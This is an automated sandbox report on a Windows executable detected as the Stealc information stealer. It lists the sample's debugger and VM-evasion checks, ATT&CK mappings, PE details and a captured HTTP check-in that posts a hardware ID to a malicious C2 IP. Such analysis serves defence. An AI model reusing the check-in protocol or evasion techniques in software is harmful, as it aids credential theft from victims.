Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00624570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00624570
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0061ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0061ED20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0061BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0061BE70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0061DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0061DE10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006116D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_006116D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00623EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00623EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0061F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0061F6B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00611160 GetSystemInfo,ExitProcess, 0_2_00611160
Source: file.exe, file.exe, 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1876333554.00000000010FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1876333554.0000000001145000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1876333554.0000000001173000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13199
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13196
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13210
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13250
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13215
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006145C0 VirtualProtect ?,00000004,00000100,00000000 | 0_2_006145C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00629860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00629860
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00629750 mov eax, dword ptr fs:[00000030h] | 0_2_00629750
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00627850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_00627850
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 6636, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00629600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00629600
Source: file.exe, file.exe, 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: 2XProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 0_2_00627B90
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00626920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess | 0_2_00626920
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00627850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_00627850
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00627A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA | 0_2_00627A30

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1876333554.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1831952446.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6636, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1876333554.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1831952446.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6636, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label | Link
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/e2b1563c6670f193.phpJD | file.exe, 00000000.00000002.1876333554.0000000001145000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/U | file.exe, 00000000.00000002.1876333554.0000000001157000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.1876333554.00000000010FE000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/9 | file.exe, 00000000.00000002.1876333554.0000000001157000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpObL | file.exe, 00000000.00000002.1876333554.0000000001157000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1528224
                        Start date and time:2024-10-07 17:07:09 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 3m 14s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:3
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@1/0@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 80%
                        • Number of executed functions: 19
                        • Number of non-executed functions: 83
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, conhost.exe
                        • Excluded IPs from analysis (whitelisted): 52.149.20.212
                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
• Not all processes were analyzed, report is missing behavior information
                        • VT rate limit hit for: file.exe
                        No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
185.215.113.37 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
| xwZfYpo16i.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
| c3KH2gLNrM.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
| NHvurkKE21.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
| XDPT5mgIBO.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
| p7SnjaA8NN.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
| 8ObkdHP9Hq.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
| MSCy5UvBYg.exe | Get hash | malicious | LummaC, Amadey, Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
                        No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
| xwZfYpo16i.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Stealc | Browse | 185.215.113.103
| c3KH2gLNrM.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Stealc, Vidar | Browse | 185.215.113.103
| NHvurkKE21.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
| XDPT5mgIBO.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
| p7SnjaA8NN.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Stealc, Vidar | Browse | 185.215.113.103
| TVyKPaL2h0.exe | Get hash | malicious | Amadey | Browse | 185.215.113.103
| bUyvu6YU2H.exe | Get hash | malicious | Amadey | Browse | 185.215.113.19
                        No context
                        No context
                        No created / dropped files found
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.944532610494713
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:1'794'560 bytes
                        MD5:c1a82a310c9dc31947dfae1e6136dc46
                        SHA1:a9868cf5ede614df7911b1e62b5d20a04fc4c259
                        SHA256:35ce1834e64cfffdd4729c0254790e7aca014b3013733ccf872907d8d04e2b2b
                        SHA512:9d92a6b5b19ffa9a4b4d82ff2a09347e7cbc5e26ce9e06c35cd9c4adb860f08b8025d6a1526efeaed0da375042fb6a2ca5143074f85d708c806c7f2212e3f077
                        SSDEEP:49152:M/JfWg/LVoIxTfmkLXMlEdeZV5yPfPhx62Aoz:i/JhpLXiEgXUvhBLz
                        TLSH:048533E2D8B50457CE1AC133A0B7CB19B85E62940E94C8B3273787FC4D9F6866F895B4
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                        Icon Hash:90cececece8e8eb0
                        Entrypoint:0xa73000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                        Instruction
                        jmp 00007F0C44C288EAh
                        cmovo ebx, dword ptr [ebx]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add cl, ch
                        add byte ptr [eax], ah
                        add byte ptr [eax], al
                        add byte ptr [0000000Ah], al
                        add byte ptr [eax], al
                        add byte ptr [eax], dh
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax+00000000h], cl
                        add byte ptr [eax], al
                        add byte ptr [edx], ah
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [ecx], al
                        add byte ptr [eax], 00000000h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        push es
                        or al, byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x25b000 | 0x22800 | d73e5942fadc9128897c3237cdc7e160 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x25e000 | 0x284000 | 0x200 | 69339860efcd63c6f2c97603092e9d3a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
xchtnbzm | 0x4e2000 | 0x190000 | 0x190000 | 94af3e6945c1139c2d77068d064eb4d6 | False | 0.9942755126953124 | data | 7.9517025024735215 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
hubelpjq | 0x672000 | 0x1000 | 0x400 | 15f3171a095d112c534dbdf6c1882ab6 | False | 0.8046875 | data | 6.298703171925784 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x673000 | 0x3000 | 0x2200 | 33fa5567cfee6c87a44f955985633450 | False | 0.06525735294117647 | DOS executable (COM) | 0.6772589354142736 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-07T17:08:19.270990+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 7, 2024 17:08:18.043797016 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 7, 2024 17:08:18.339405060 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 7, 2024 17:08:18.339523077 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 7, 2024 17:08:18.346466064 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 7, 2024 17:08:18.351304054 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 7, 2024 17:08:19.022883892 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 7, 2024 17:08:19.023215055 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 7, 2024 17:08:19.039110899 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 7, 2024 17:08:19.043984890 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 7, 2024 17:08:19.269064903 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 7, 2024 17:08:19.270989895 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 7, 2024 17:08:22.548217058 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                        • 185.215.113.37
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | 6636 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 17:08:18.346466064 CEST | 89 | OUT | GET / HTTP/1.1
                        Host: 185.215.113.37
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Oct 7, 2024 17:08:19.022883892 CEST | 203 | IN | HTTP/1.1 200 OK
                        Date: Mon, 07 Oct 2024 15:08:18 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Oct 7, 2024 17:08:19.039110899 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----AAEGHJKJKKJDHIDHJKJD
                        Host: 185.215.113.37
                        Content-Length: 211
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Data Raw: 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 34 33 36 39 44 30 35 37 38 45 36 34 31 32 30 30 32 31 34 35 34 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 2d 2d 0d 0a
                        Data Ascii: ------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="hwid"94369D0578E64120021454------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="build"doma------AAEGHJKJKKJDHIDHJKJD--
                        Oct 7, 2024 17:08:19.269064903 CEST | 210 | IN | HTTP/1.1 200 OK
                        Date: Mon, 07 Oct 2024 15:08:19 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 8
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 59 6d 78 76 59 32 73 3d
                        Data Ascii: YmxvY2s=



                        Target ID: 0
                        Start time: 11:08:14
                        Start date: 07/10/2024
                        Path: C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit): true
                        Commandline: "C:\Users\user\Desktop\file.exe"
                        Imagebase: 0x610000
                        File size: 1'794'560 bytes
                        MD5 hash: C1A82A310C9DC31947DFAE1E6136DC46
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1876333554.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1831952446.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation: low
                        Has exited: true


                          Execution Graph

                          Execution Coverage:8.5%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:9.7%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:24
